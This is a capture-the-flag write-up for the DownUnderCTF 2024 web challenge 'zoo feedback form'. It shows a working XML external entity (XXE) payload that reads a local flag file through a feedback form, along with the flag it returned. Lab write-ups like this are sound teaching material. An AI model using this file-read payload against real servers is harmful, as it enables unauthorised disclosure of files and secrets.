MQCyberSec

MQCyberSec Logo

MQCyberSec
Back to Writeups

zoo feedback form

by sealldev
🚩 CTFs DownUnderCTF 2024 web
Suggested: #xxe
zoo feedback form / DownUnderCTF 2024
zoo feedback form

Description

The zoo wants your feedback! Simply fill in the form, and send away, we'll handle it from there!

Original Writeup on seall.dev

We are given both a web source code zip and an instance.

zoofeedbackform

It reflects what we type, lets see whats going on in the request when I press Submit Feedback.

<?xml version="1.0" encoding="UTF-8"?>
            <root>
                <feedback>hi!!</feedback>
            </root>

Hm, XML has some common attacks such as XXE. I look at the source code and see we need to read a ./flag.txt.

Looking at the XXE example payloads I craft a file read payload like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "./flag.txt"> ]>
            <root>
                <feedback>&example;</feedback>
            </root>

Let’s try it!

Feedback sent to the Emus: DUCTF{emU_say$_he!!0_h0!@_ci@0}

Flag: DUCTF{emU_say$_he!!0_h0!@_ci@0}

Related Writeups

Insp3ct0r

Kishor Balan tipped us off that the following code may need inspection: https://jupiter.challenges.picoctf.org/problem/4 ...

#easy

caas

Now presenting cowsay as a service https://caas.mars.picoctf.net/

#medium

Cookies

Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:17781/

#easy

Share this writeup

Contribute

Found an issue or want to improve this writeup?

Edit on GitHub